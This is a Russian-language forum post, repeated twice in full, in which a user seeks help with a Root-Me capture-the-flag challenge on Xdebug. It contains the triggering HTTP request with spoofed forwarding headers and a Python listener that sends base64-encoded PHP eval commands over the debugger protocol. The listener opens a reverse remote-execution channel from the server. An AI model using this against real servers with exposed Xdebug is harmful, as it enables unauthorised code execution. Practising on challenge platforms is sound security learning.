tester_new
23.05.2020, 15:44
День добрый,
уже несколько часов не могу пройти данный таск(прошли его 1% пользователь):
http://challenge01.root-me.org/web-serveur/ch64/
Обновлю свой пост который так и не получил ответа)), значительно продвинулся в данном таске(по факту составил верный HTTP запрос и все...) уже получаю шел НО проблема в том что в php все 'интересные' функции отключены(может я ошибаюсь), вообщем кидаю ниже HTTP пакет который я отправляю посредством Burp(можно конечно использовать массу других утилит) на сервер и после чего мне успешно прилетает шел, но как я писал выше толку с данного шела мало...
Пакет:
GET /web-serveur/ch64/?XDEBUG_SESSION_START=phpstorm HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Forwarded-For:IP
HTTP_CLIENT_IP:IP
Upgrade-Insecure-Requests: 1))
Cookie: XDEBUG_SESSION_START=phpstorm
Content-Length: 2
Скрипт(listener) который получает коннект:
Code:
#!/usr/bin/python2
import socket
ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
print(client_data)
data = raw_input('>> ')
conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
Пример как пытаюсь юзать:
Code:
Getting a connection from server and try to execute command:
511
>> system('pwd')
210
>> exec('pwd')
210
>> shell_exec('pwd')
210
>> escapeshellcmd('pwd')
уже несколько часов не могу пройти данный таск(прошли его 1% пользователь):
http://challenge01.root-me.org/web-serveur/ch64/
Обновлю свой пост который так и не получил ответа)), значительно продвинулся в данном таске(по факту составил верный HTTP запрос и все...) уже получаю шел НО проблема в том что в php все 'интересные' функции отключены(может я ошибаюсь), вообщем кидаю ниже HTTP пакет который я отправляю посредством Burp(можно конечно использовать массу других утилит) на сервер и после чего мне успешно прилетает шел, но как я писал выше толку с данного шела мало...
Пакет:
GET /web-serveur/ch64/?XDEBUG_SESSION_START=phpstorm HTTP/1.1
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Forwarded-For:IP
HTTP_CLIENT_IP:IP
Upgrade-Insecure-Requests: 1))
Cookie: XDEBUG_SESSION_START=phpstorm
Content-Length: 2
Скрипт(listener) который получает коннект:
Code:
#!/usr/bin/python2
import socket
ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
print(client_data)
data = raw_input('>> ')
conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
Пример как пытаюсь юзать:
Code:
Getting a connection from server and try to execute command:
511
>> system('pwd')
210
>> exec('pwd')
210
>> shell_exec('pwd')
210
>> escapeshellcmd('pwd')